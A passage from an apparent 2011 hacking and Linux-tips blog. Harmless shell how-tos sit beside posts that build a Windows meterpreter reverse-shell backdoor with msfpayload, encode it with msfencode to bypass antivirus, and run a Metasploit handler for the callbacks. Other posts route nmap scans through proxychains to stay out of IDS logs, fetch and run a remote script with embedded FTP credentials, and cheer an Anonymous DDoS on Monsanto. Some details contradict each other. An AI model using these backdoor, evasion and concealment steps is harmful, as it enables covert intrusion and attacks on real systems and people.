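        out.write("\n".join(hashes) + ("\n" if hashes else ""))
    return len(hashes)


# Constructed input mixing a pwdump-style line with other hash types.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:098f6bcd4621d373cade4e832627b4f6:::
sha1 of something: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
sha256 of something: 9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08
same md5 upper-cased: 098F6BCD4621D373CADE4E832627B4F6
short LM password: 9a5760252b7455deaad3b435b51404ee
"""

if __name__ == "__main__":
    if len(sys.argv) == 3:
        print("File parsed ~ %d hashes found." % parse_file(sys.argv[1], sys.argv[2]))
    else:
        for h in extract_hashes(SAMPLE):
            print(h, "-", classify(h))
```

With a file and an output name on the command line it behaves like md5parser.py; without arguments it runs over the built-in sample, where the SHA-1 and SHA-256 lines produce no matches at all and the upper-cased duplicate collapses into the first copy.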

Saturday, June 18, 2011

Adding fluxbox styles.

I've had a few people ask me how to change their fluxbox theme, so I've decided to make a quick how-to on adding styles, which is very easy.

First off, know that the system-wide fluxbox styles are stored in "/usr/share/fluxbox/styles" (per-user styles go in ~/.fluxbox/styles).

So all you have to do is download your theme of choice and extract it into the styles folder. Now the new style should be listed in the fluxbox styles menu.

Bam, you're done.

Compiling skipfish and fixing errors.

Well, this is the second time I'm writing this... so this one will be a bit more brief. I had encountered some issues when installing the latest version of skipfish on my desktop, one involving "idna.h" and the other a whole plethora of SSL-related issues. With some googling I solved them, so I've decided to make a quick post to help others who want to install this tool or have encountered the same errors as I had.

Both issues are missing development headers and are solved by installing the following packages, but we will want to update first of course.

sudo apt-get update
sudo apt-get install libssl-dev && sudo apt-get install libidn11-dev

Now we will proceed on to downloading the source for those who have just come across this to compile it, or whatever the case may be.

wget http://skipfish.googlecode.com/files/skipfish-1.94b.tgz
tar -xvzf skipfish-1.94b.tgz
cd ./skipfish-1.94b
make

Now you should have successfully compiled yourself a working skipfish binary which can be used like so;

./skipfish -h

Friday, June 17, 2011

Find a file and its directory in linux

Okay this is a quick tip, which a lot of you guys probably know, but I forgot about it until just now. I always find myself in a situation where I need to find a file's location but can't seem to locate it, at which point I resort to google. A quicker and easier way to do this is the "whereis" command (which only searches the standard binary, source and man page directories).

~ $ whereis conky
conky: /usr/bin/conky /etc/conky /usr/lib/conky /usr/share/man/man1/conky.1.gz

Alternatively you could use the find command.

 ~ # find / -iname conky
/etc/conky
/usr/bin/conky
/usr/share/doc/conky
/usr/lib/conky

Monday, June 13, 2011

Anonymous nmap scans

This is an extremely simple tutorial on how you can use "proxychains" to anonymize your nmap scans, or to send your traffic through several IPs so the IDS/firewall logs do not show which one is really you. First, proceed to the following link to download the proxychains package.

http://prdownloads.sourceforge.net/proxychains/proxychains-3.1.tar.gz?download

Now we need to extract it's contents with the "tar" command so that we can configure it and compile it.

~ $ tar -xvzf proxychains-3.1.tar.gz

That will extract it into the current directory; now we "cd" into that directory, configure it, then compile and install it.

cd ./proxychains-3.1
./configure
make
sudo make install

Now you'll have proxychains built and installed for your system. Before you can use it you must configure it, unless you're using Tor, which is its default setting (socks4 127.0.0.1 9050). proxychains looks for proxychains.conf in the current directory first, then ~/.proxychains/, then /etc/.

nano proxychains.conf

At this point you will want to scroll down to the bottom of the file, which is where you configure which proxies to use and what type they are.

For example the default should look like this;
#        Examples:
#
#               socks5  192.168.67.78   1080    lamer   secret
#               http    192.168.89.3    8080    justu   hidden
#               socks4  192.168.1.49    1080
#               http    192.168.39.93   8080
#
#
#       proxy types: http, socks4, socks5
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050

So, if you're using tor than you can just leave it, or add more proxies in the chain. Say I wanted to add an http proxy to the chain, I would edit the config file like so.

#        Examples:
#
#               socks5  192.168.67.78   1080    lamer   secret
#               http    192.168.89.3    8080    justu   hidden
#               socks4  192.168.1.49    1080
#               http    192.168.39.93   8080
#
#
#       proxy types: http, socks4, socks5
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050
http 189.47.194.196 8080 

Now, you're ready to use it. You can run a tool through proxychains like this;

./proxychains nmap -sT -Pn -n 199.66.1.11

The flags matter. proxychains works by hooking the connect() calls of a dynamically linked program, so only plain TCP connections go through the chain. nmap's default SYN scan, its ICMP/ARP host discovery and its UDP scans use raw sockets and go straight to the target from your real address, which is exactly what you were trying to avoid. Use -sT (full TCP connect scan), -Pn (skip host discovery) and -n (no DNS lookups, or enable proxy_dns in proxychains.conf) so neither the probes nor the name resolution leak.

And that about wraps it up for this quick how-to on anonymizing nmap scans.

Sunday, June 12, 2011

Anonymous targets Monsanto

Well, it looks like Monsanto was recently in Anon's scope, being hit with a DDoS that was said to have lasted over 60 hours. There were also vulnerabilities found such as SQLi on their foreign sites, though their focus seemed to have been on DoSing monsanto.com.

As I write this, their site still remains down due to the DoS Anon was so nice as to supply. It seems even Anon realizes Monsanto is a terrible corporation whose main goal is complete control of the food supply. As Henry Kissinger once said, "If you control the oil you control the country; if you control food, you control the people."

I really hope the population wakes up and gets a grip on reality, rather than this material illusion the general public succumbs to.

I'm glad the hacking community takes notice of Monsanto and their dirty ways, rather than cracking a tin foil hat joke while stuffing their face with genetically modified chips covered in MSG and watching television.

Saturday, June 4, 2011

Notify-Send - On Screen text display

To start off, download the following package with your repositories;

apt-get install libnotify-bin

After that you can test it like so;

notify-send "Resist Monsanto"

That will create a popup on your screen displaying the text you entered.

Now if you were to try to enter a command within the quotes, or even without, it will simply be displayed as text. The way to tell notify-send to display the results of a command is to wrap the command in backticks (command substitution). For example;

notify-send "` w `"

Though that's a big jumbled up on this netbook, so I'm going to pipe it to awk to shorten it a bit and just display what I want to see.

notify-send "` w | awk '{print $1 " -> " $8}'`"

So now that will show me whos logged onto this system and what they're currently doing. I could have this process automated with a while loop in order to have some desired notification displayed to me every however amount of minutes I've chosen. For example;

while [ 1 ]; do notify-send "` w | awk '{print $1 " -> " $8}'`"; sleep 10; done

That would create a pop-up every 10 seconds showing me who's logged on and what they're currently doing. If we wanted something a bit longer than a few seconds, then we can add an "m" to the sleep argument to make it 10 minutes instead.

while [ 1 ]; do notify-send "` w | awk '{print $1 " -> " $8}'`"; sleep 10m; done

You can also alter how long the popup is displayed by specifying a time in milliseconds that it should stay up before expiring (so 5000 for five seconds; note that some notification daemons ignore this value).

notify-send -t 5000 "` w | awk '{print $1 " -> " $8}'`"

Another feature of notify-send is the ability to display icons, and a title. This is demonstrated below;

notify-send "Monsanto" "Genetically Modifying People Near YOU" -i /usr/share/pixmaps/terminator.xpm -t 5000

You may not have that icon if you don't have the terminal emulator "terminator", in which case I highly suggest giving it a try. It's by far my favorite terminal.

Now that just about covers this brief "how-to" on notify-send, and as you can see there's quite a few things this tool can be used for. I'm sure you'll think of plenty of your own ideas. Feel free to share the things you use notify-send for, and maybe share your own scripts and ideas.

Bypassing Anti-Virus with msfencode.

Well I had recently posted about msfpayload and how to generate a backdoored exe using it. What I left out was msfencode, which is extremely useful because the "unpacked" executable is very likely to be detected by most Anti-Virus. You can find my previous post here.

Now lets take what we learned from the last post and pipe the msfpayload command to msfencode.

~ $ msfpayload windows/meterpreter/reverse_tcp LHOST=19.84.20.11 LPORT=3030 R | msfencode -e x86/shikata_ga_nai -t exe -c 5 -o FuckMonsanto.exe

This pipes the payload into msfencode, which passes it through the encoder 5 times (-c sets the number of iterations), using the polymorphic XOR encoder "shikata ga nai", and writes the backdoor out as "FuckMonsanto.exe".

You can fire up the handler in Metasploit the same way as before, but I'd like to add that you can run it as a "job", which runs in the background, by using the "-j" option.

msf> use exploit/multi/handler 
msf exploit(Handler) > set payload windows/meterpreter/reverse_tcp 
msf exploit(Handler) > set LHOST 19.84.20.11 
msf exploit(Handler) > set LPORT 3030
msf exploit(Handler) > exploit -j

Now you can continue with your pentest while the handler runs in the background and waits for connections; the "jobs" command lets you list and interact with the jobs running in the background.

Sunday, May 29, 2011

Installing TOR manually - Debian / BT5

This will be a quick how-to on installing Tor manually in BT5. First, open your sources.list to add the Tor repository, like so;

nano /etc/apt/sources.list 

Then add the following Tor repository line to the list; the distro name will vary. To find out what version of Debian you're running, simply read the Debian version file with cat;

cat /etc/debian_version

Now that you know what version of Debian you're running, replace <Distro> with it.

deb http://deb.torproject.org/torproject.org <Distro> main 

Save that with "ctrl-o" and then add the GNU Privacy Guard key that is used to sign the Tor packages;

gpg --keyserver keys.gnupg.net --recv 886DDD89 
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add - 

Now update your system and install the tor packages. 

apt-get update 
apt-get install tor tor-geoipdb 
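An added example, not from the original post, that scripts the sources.list step above. Two things a practitioner wants here: an apt line needs the release codename (e.g. "squeeze"), which is what lsb_release -cs and /etc/os-release report, rather than the numeric string in /etc/debian_version; and the append should be idempotent so that running the how-to twice doesn't leave duplicate entries. The repository URL is the one from the post; everything else is my own.

```shell
#!/bin/sh
# Added example (not code from the original post): build the Tor apt line
# for the running release and add it to a sources.list only if missing.

TOR_REPO='http://deb.torproject.org/torproject.org'

# debian_codename: the codename apt expects (squeeze, lucid, ...).
# lsb_release is tried first, then /etc/os-release in a subshell so its
# variables don't leak into the caller; "unknown" if neither is available.
debian_codename() {
    if command -v lsb_release >/dev/null 2>&1; then
        lsb_release -cs
    elif [ -r /etc/os-release ]; then
        ( . /etc/os-release; printf '%s\n' "${VERSION_CODENAME:-unknown}" )
    else
        echo unknown
    fi
}

# tor_apt_line CODENAME: the sources.list entry for that release
tor_apt_line() {
    printf 'deb %s %s main\n' "$TOR_REPO" "$1"
}

# add_apt_line FILE LINE: append LINE to FILE unless an identical line
# (-x whole line, -F fixed string) is already there. Returns 0 either way.
add_apt_line() {
    file=$1
    line=$2
    if grep -qxF -- "$line" "$file" 2>/dev/null; then
        return 0
    fi
    printf '%s\n' "$line" >> "$file"
}

# Usage (as root):
#   add_apt_line /etc/apt/sources.list "$(tor_apt_line "$(debian_codename)")"
```

After that, the key import and apt-get steps from the post are unchanged; the gpg --export by full fingerprint is what pins the key you're trusting, so keep it exactly as written.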

Now that Tor is installed, you can move on to installing Polipo and the Vidalia GUI.

SIPVicious Usage

Well I was going to go and make a quick SIPVicious demo, but there's already a video that gives a good demo of what these scripts are capable of doing. So instead of making another video, I'll just embed his, as it's a good tutorial.


SIPVicious - SIP/VoIP Auditing Suite

SIPVicious suite is a set of tools that can be used to audit SIP based VoIP systems. It currently consists of four tools: 
  • svmap - this is a sip scanner. Lists SIP devices found on an IP range
  • svwar - identifies active extensions on a PBX
  • svcrack - an online password cracker for SIP PBX
  • svreport - manages sessions and exports reports to various formats
  • svcrash - attempts to stop unauthorized svwar and svcrack scans 
Find out more information as well as the official source here.

Friday, May 20, 2011

Using pipelines to pipe data.

Well this is a simple concept, but its usefulness has no limits. It's the ability to pipe the output of one command into another as input. For example, I can combine the "ip addr" command with grep to only display the lines containing the inet addresses.

 ~ $ ip addr | grep inet
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
    inet 10.0.0.3/24 brd 192.168.1.255 scope global eth0
    inet6 fe80::217:31ff:feda:9814/64 scope link

You could pipe that data along further to awk, then select specific data out of it to be displayed. For example;

 ~ $ ip addr | grep inet | awk '{print $2 ":" $4}'
127.0.0.1/8:host
::1/128:host
192.168.1.102/24:192.168.1.255
fe80::217:31ff:feda:9814/64:link

Another example involves that simple Java IP parser I made. While using it I noticed that a lot of scans had duplicate IPs, which could waste valuable time running tools against the same IP multiple times. I haven't been playing much with Java lately, so I decided to just fix the problem in a bash script with the "uniq" command. This is the command the script uses to remove duplicate IPs from the IP list.

java -jar ips.jar nlog | sort | uniq > iplist.txt

That parses the nmap log for IPs; the output is sorted so that repeated addresses land next to each other (uniq only collapses adjacent duplicates, so without the sort non-adjacent repeats would survive), then uniq removes the duplicates and the result is written to a file called iplist.txt, one IP per line.

You can find that Java parser here.
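An added example, not from the original post, showing the uniq pitfall on constructed nmap-style (-oG) output. The Java parser from the post isn't available, so a three-line awk stands in for it; the same host shows up twice but not on adjacent lines, which is exactly the case plain uniq misses.

```shell
#!/bin/sh
# Added example (not code from the original post): extract IPv4 addresses
# from a greppable scan log and dedup them, with and without a sort first.

# Constructed sample log: 10.0.0.3 and 10.0.0.7 each appear twice, non-adjacently.
SAMPLE_LOG='Host: 10.0.0.3 ()  Status: Up
Host: 10.0.0.7 ()  Status: Up
Host: 10.0.0.3 ()  Ports: 22/open/tcp//ssh///
Host: 10.0.0.7 ()  Ports: 80/open/tcp//http///
Host: 10.0.0.9 ()  Status: Up'

# extract_ips: print the address field of every "Host:" line on stdin
# (stand-in for the post's Java parser)
extract_ips() {
    awk '$1 == "Host:" { print $2 }'
}

# dedup_adjacent: what bare uniq does; only neighbouring repeats collapse
dedup_adjacent() {
    uniq
}

# dedup_all: sort first so every repeat becomes adjacent, then uniq
dedup_all() {
    sort | uniq
}

# count_ips FILTER: run the sample through extract_ips and FILTER, count lines
count_ips() {
    printf '%s\n' "$SAMPLE_LOG" | extract_ips | "$1" | wc -l | tr -d ' '
}

# unique_ips: the deduplicated list, one per line, as iplist.txt would contain
unique_ips() {
    printf '%s\n' "$SAMPLE_LOG" | extract_ips | dedup_all
}
```

On the sample, dedup_adjacent still leaves five lines while dedup_all leaves three; "sort -u" is the shorthand for the sort-then-uniq pair.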

Tuesday, May 17, 2011

Using wget to download ftp files

This is a quick example of how you can use wget to download more than just HTML files; in this case we will download a shell script off our FTP server and then execute it.

#!/bin/bash
# bash rather than sh: "echo -e" is a bash feature, plain sh may print the "-e" literally
echo -e "\033[1;32;1mAttempting to destroy monsanto before they contaminate the planet with hazardous GMO's"
wget --ftp-user Pathogen --ftp-password hakhub ftp://ftp.drivehq.com:21/DestroyMonsanto.sh
chmod 755 DestroyMonsanto.sh
./DestroyMonsanto.sh
echo "Too late"

That is a basic example of a shell script which would download a file using wget, give it the appropriate permissions, then execute it. If you need free ftp storage, check out drivehq.
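An added example, not from the original post, of the same download-then-execute flow with two changes a practitioner would want: the FTP password comes from ~/.netrc (which wget reads for FTP logins) instead of the command line, where it would show up in "ps" and the shell history; and the script is only made executable and run after its SHA-256 matches a value you already trust, so a swapped file on the server (FTP is cleartext, after all) fails closed. The URL and expected hash are placeholders; the "hello" file in the comments is constructed test input.

```shell
#!/bin/sh
# Added example (not code from the original post): fetch a script, verify
# its SHA-256 against a known-good value, and only then chmod and run it.

# sha256_of FILE: hex digest, portable across sha256sum (GNU) and shasum (BSD/macOS)
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_file FILE EXPECTED_SHA256: 0 if the digest matches, 1 otherwise.
# Constructed check: a file containing "hello\n" hashes to
# 5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03
verify_file() {
    actual=$(sha256_of "$1") || return 1
    [ "$actual" = "$2" ]
}

# fetch_and_run URL EXPECTED_SHA256 DEST
# Credentials: put "machine ftp.example.net login USER password PASS" in
# ~/.netrc (mode 600); wget picks them up, nothing appears on the command line.
fetch_and_run() {
    url=$1
    expected=$2
    dest=$3
    wget -q -O "$dest" "$url" || { echo "download of $url failed" >&2; return 1; }
    if verify_file "$dest" "$expected"; then
        chmod 755 "$dest"
        case $dest in */*) ;; *) dest=./$dest ;; esac   # run a bare name from cwd
        "$dest"
    else
        echo "checksum mismatch for $dest, refusing to run it" >&2
        rm -f "$dest"
        return 2
    fi
}

# Usage (placeholders, not real values):
#   fetch_and_run ftp://ftp.example.net/DestroyMonsanto.sh <expected-sha256> DestroyMonsanto.sh
```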

Monday, May 16, 2011

BT5 was released.

In case you guys haven't heard for some reason, BackTrack 5 has been released. I'm really enjoying it; it's probably my favorite one so far. The GUI is nice, and the tools are great as always. Download it from here;

http://www.backtrack-linux.org/downloads/

Getting started with Armitage

Well I've never bothered playing with Armitage before, but I figured what the hell. I decided to post a quick how-to on getting it fired up for the first time. First, make sure you're all up to date, then install Armitage from your repositories.

apt-get update
apt-get install armitage

Then we have to fire up Metasploit's RPC daemon, as that's what Armitage uses to interact with the Metasploit framework.

msfrpcd -f -U msf -P test -t Basic

Now make sure MySQL is up and running;

/etc/init.d/mysql start

Now, change into Armitage's directory and run the shell script "armitage.sh". On BT4 (BT5 is out now) you would issue these commands.

cd /pentest/exploits/armitage
./armitage.sh

Now, seeing as we set the user as "msf" and the password as "pass" with the msfrpcd command, we can just hit "connect". That should do it; if all's well you'll see something like this;

Sunday, May 15, 2011

Creating an executable payload via msfpayload.

This is a quick tutorial on how to create an executable from a Metasploit payload. We will use a meterpreter payload; here's the command to issue to create an ".exe".

msfpayload windows/meterpreter/reverse_tcp LHOST=19.84.20.11 LPORT=31337 X > /root/Shiny.exe

You can then verify it was created by using the "file" command, like so;

file /root/Shiny.exe

And it should say something along the lines of this;

/root/Shiny.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

You now have a working payload in the form of an exe, so you can fire up Metasploit and use the exploit handler to listen for the incoming connections. Assuming we are in the Metasploit console, we would issue the following commands;

msf> use exploit/multi/handler 
msf exploit(Handler) > set payload windows/meterpreter/reverse_tcp 
msf exploit(Handler) > set LHOST 19.84.20.11 
msf exploit(Handler) > set LPORT 31337 
msf exploit(Handler) > exploit 

You now have a handler waiting for incoming connections from those who run your meterpreter payload.

Saturday, May 14, 2011

Using colors in bash scripts with ANSI/VT100 codes.

Well, I've made a few posts related to bash scripting so I thought I'd make a quick post showing how you can add some color to your scripts. We will be using ANSI escape codes; here's a quick example of how to use them;

echo -e "Hey look at \033[1;32;1m this color, we'll make the rest of the script blue \033[0;34;1m"
nmap 127.0.0.1


Make sure you remember the "-e", which enables the interpretation of backslash escapes so echo will actually accept the ANSI code rather than printing it out like a normal string.
Console Color chart

Foreground (normal / bright):
Black       0;30     Dark Gray     1;30
Blue        0;34     Light Blue    1;34
Green       0;32     Light Green   1;32
Cyan        0;36     Light Cyan    1;36
Red         0;31     Light Red     1;31
Purple      0;35     Light Purple  1;35
Brown       0;33     Yellow        1;33
Light Gray  0;37     White         1;37

Backgrounds:
40  Black
41  Red
42  Green
43  Yellow
44  Blue
45  Magenta
46  Cyan
47  White

You can also add other attributes such as using underlined or bold/bright text by changing the last digit in the code, just before the "m". For example, to use the underline attribute I would do this;


echo -e "Hey look at \033[1;32;1m this color, we'll make the rest of the script blueish \033[0;34;4m"
echo -e "This is underlined\033[0m this is not"

Some Useful Attribute Codes

0m = Reset all attributes.
1m = Set the "bright" attribute.
2m = Set the "dim" attribute.
4m = Sets the "underline" attribute
5m = Sets the "blink" attribute.
7m = Sets the "reverse" attribute.
8m = Sets the "hidden" attribute.
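An added example, not from the original post, that wraps the codes above in small functions. Each one appends the reset sequence ("0m") so a colour never bleeds into the next command's output the way the deliberately unreset echo earlier does, and a strip function removes the sequences again when the output isn't going to a terminal (colour codes in a log file are just noise for grep later). The function names and the "[ OK ]/[FAIL]" report format are my own.

```shell
#!/bin/sh
# Added example (not code from the original post): colour helpers that
# always reset, plus a filter that strips the escape sequences.

ESC=$(printf '\033')   # the escape byte; printf keeps it out of the source text

# colorize CODES TEXT: CODES is the "attr;fg" pair from the chart, e.g. 1;32.
# Emits ESC[CODESm TEXT ESC[0m, so attributes are reset after TEXT.
colorize() {
    printf '%s[%sm%s%s[0m' "$ESC" "$1" "$2" "$ESC"
}

green()     { colorize '1;32' "$1"; }
red()       { colorize '0;31' "$1"; }
underline() { colorize '4'    "$1"; }

# strip_ansi: remove CSI colour/attribute sequences (ESC [ digits ; ... m) from stdin
strip_ansi() {
    sed "s/${ESC}\[[0-9;]*m//g"
}

# status_line LABEL OK: a coloured "[ OK ] label" or "[FAIL] label" line
status_line() {
    if [ "$2" = 1 ]; then
        printf '%s %s\n' "$(green '[ OK ]')" "$1"
    else
        printf '%s %s\n' "$(red '[FAIL]')" "$1"
    fi
}

# report LABEL OK: colour only when stdout is a terminal; when redirected to
# a file or pipe, the codes are stripped so the log stays clean.
report() {
    if [ -t 1 ]; then
        status_line "$@"
    else
        status_line "$@" | strip_ansi
    fi
}

# Usage: report "nmap 127.0.0.1" 1; report "arpwatch" 0 >> scan.log
```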

This is where I'll end this quick example of ANSI/VT100 codes being used to add color to your bash scripts. This is only a sample of the possibilities these codes create, so don't think it ends here. You can learn more at this site.

Tuesday, May 10, 2011

Some useful shell commands/tools

Well I've been learning some useful things I previously didn't know about, so I thought I'd take a moment and post some useful things you can do at the command line.


See who's logged in and what they're doing with the "w" command;

~ $ w
 00:41:06 up 1 day,  1:13,  8 users,  load average: 1.57, 1.14, 1.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
pathogen pts/0    :0.0             Sun23    2:27m 57.59s  3:26  /usr/bin/python
pathogen pts/1    :0.0             Mon00   23:08m  0.29s  0.29s /bin/bash
pathogen pts/2    :0.0             Mon00   23:59m 35.86s  0.27s /bin/bash
pathogen pts/3    :0.0             Mon01   22:41m  4.50s  4.25s polipo
pathogen pts/4    :0.0             Mon02    1:42  44.25s  3:26  /usr/bin/python
pathogen pts/5    :0.0             23:32    0.00s  0.27s  0.01s w
pathogen pts/6    :0.0             23:34   57:46   0.48s  0.48s bash
pathogen pts/7    :0.0             23:44   56:24   0.28s  0.28s /bin/bash

The next command is the "tail" command which we used with arpwatch in a previous post. This command can be used to read the last 10 lines (or more) of a file or piped data and displays it in the terminal. This is nice if you want to watch logfiles for example.

tail -f /var/log/syslog

Another good command line tool is "top", which displays processor and process statistics in real time. 


Next is an extremely handy command - man - which is short for manual and is used to display in-depth information about a given command, or to search for manuals containing a keyword. For example, the command "man ascii" returns a rather detailed ASCII chart - which we all know can be a lifesaver. You can search for manuals containing a keyword like so;

~ $ man -k irc
aircrack-ng (1)      - a 802.11 WEP / WPA-PSK key cracker
airodump-ng (1)      - a wireless packet capture tool for aircrack-ng
airtun-ng (1)        - a virtual tunnel interface creator for aircrack-ng
queue (3)            - implementations of lists, tail queues, and circular queues
dir_colors (5)       - configuration file for dircolors(1)
dircolors (1)        - color setup for ls
irssi (1)            - a modular IRC client for UNIX
xchat (1)            - IRC client for X similar to AmIRC
XCirculateEvent (3)  - CirculateNotify event structure
XCirculateRequestEvent (3) - CirculateRequest event structure
XCirculateSubwindows (3) - change window stacking order
XCirculateSubwindowsDown (3) - change window stacking order
XCirculateSubwindowsUp (3) - change window stacking order

This one is more of a tip - autocompleting a command or directory using "TAB". If there's only one option then it autocompletes when you hit tab, otherwise it shows the possibilities. For example, hitting "TAB" with "net" typed in the shell returns this;

~ $ net
net         netcat      netkit-ftp  net.samba3  netscsid    netstat  

And hitting tab with "/var/" typed will show me the existing directories in /var/, but if I hit "TAB" with "/var/r" then it will autocomplete it to "/var/run" because there's only one option.

This next command is "cat", which concatenates a file and displays it in the terminal. For example if we wanted to read the text file "hakhub" we could just use "cat";

~ $ cat hakhub
Is effin awesome.

You can also string commands together using the ";" operator, like we did with the IP parser and nmap. For example we can make a new directory and then copy our "hakhub" textfile to it. We will "cat" it at the end to verify it's there.

mkdir learning; cp hakhub /root/learning/;cat /root/learning/hakhub

Another useful command is "ln", which creates a link to a given file. For example we will make a symbolic link in the learning directory we created to the "hakhub" textfile in our root directory. Assuming we are currently in the root directory we will issue this command;

ln -s /root/hakhub /root/learning/stuff

There's now a file in our learning directory which links back to our hakhub textfile (the target is given as an absolute path because a relative target is resolved relative to the link's own directory), so if we were to cat the "stuff" link it would display its contents just as before. This can be useful for creating links to tools located in various directories.

The next useful shell command is "screen", which I use to easily switch between various shells in one window (using Ctrl-A);

"Screen is a full-screen window manager that multiplexes a physical terminal between several processes (typically interactive shells)."

You can read more about screen and get an idea of what it is and how it can be used here - http://linux.die.net/man/1/screen

This next one is "df", which stands for diskfree. Very basic but still nice to know if you have multiple drives or usb's up the yingyang.

 ~ $ df 
Filesystem           1K-blocks      Used Available Use% Mounted on
/dev/sda1            237431480  51512296 173858308  23% /
none                    501520       316    501204   1% /dev
none                    508544       284    508260   1% /dev/shm
none                    508544       112    508432   1% /var/run
none                    508544         0    508544   0% /var/lock
none                    508544         0    508544   0% /lib/init/rw
none                 237431480  51512296 173858308  23% /var/lib/ureadahead/debugfs
/dev/sdd1              1965696    637664   1328032  33% /media/SD Card
/dev/sdc1              1930464   1291072    639392  67% /media/disk-1

Next is "wget", which is a utility for non-interactive download of files from the internet. It supports both http and https along with ftp and has the ability to utilize proxies. This can be used in a variety of ways, it can be used with conky via bash scripts for example. Backtrack 4 uses a wget bash script to check the external ip and display it in conky. Though the possibilities are endless, that's just one example.

Another great tool that's simple yet has a ton of possible uses when coupled with other tools is grep. This tool is built around regular expressions and is used to search files for text. For example, this command would look for
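An added example, not from the original post, of the grep options that come up most when digging through logs: a fixed-string match, an inverted match, an extended regexp with an escaped IP, a match count, and the usual hand-off to awk and uniq -c. The sshd/cron lines are constructed sample input (documentation IP ranges, made-up users).

```shell
#!/bin/sh
# Added example (not code from the original post): grep idioms over a
# constructed auth log.

# Constructed sample log; hosts and users are made up.
AUTH_LOG='May 10 00:12:01 box sshd[2011]: Failed password for invalid user admin from 203.0.113.5 port 40122 ssh2
May 10 00:12:04 box sshd[2011]: Failed password for root from 203.0.113.5 port 40122 ssh2
May 10 00:12:09 box sshd[2015]: Accepted publickey for pathogen from 192.0.2.10 port 51000 ssh2
May 10 00:12:12 box sshd[2019]: Failed password for root from 198.51.100.7 port 40130 ssh2
May 10 00:12:20 box cron[2033]: (root) CMD (run-parts /etc/cron.hourly)'

# failed_logins: -F treats the pattern as a fixed string, not a regexp
failed_logins() { grep -F 'Failed password'; }

# non_ssh: -v inverts the match, keeping lines that are NOT from sshd
non_ssh() { grep -v 'sshd\['; }

# failed_from IP: -E enables extended regexps; the dots in the IP are
# escaped so "203.0.113.5" cannot also match "203x0x113x5"
failed_from() {
    escaped=$(printf '%s' "$1" | sed 's/\./\\./g')
    grep -E "Failed password .* from ${escaped} port"
}

# count_failed: -c prints how many lines matched instead of the lines
count_failed() { printf '%s\n' "$AUTH_LOG" | grep -c 'Failed password'; }

# failed_sources: source IPs of failed logins with a count each, busiest first
failed_sources() {
    printf '%s\n' "$AUTH_LOG" | failed_logins \
        | awk '{ for (i = 1; i <= NF; i++) if ($i == "from") print $(i + 1) }' \
        | sort | uniq -c | sort -rn
}

# Usage: failed_sources      (or pipe a real file: grep -F 'Failed password' /var/log/auth.log | ...)
```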

This next tool is links2 which is a console-based text web browser which is extremely lightweight as you could imagine. There's others like it such as lynx, but I prefer links2 myself. You can use it by typing links2 in your console, then pressing "g" and entering the url. You can use links2 with a proxy like so;

links2 -http-proxy 127.0.0.1:9050

Or, to run it with a graphical interface, add "-g";

links2 -g -http-proxy 127.0.0.1:9050

To be continued......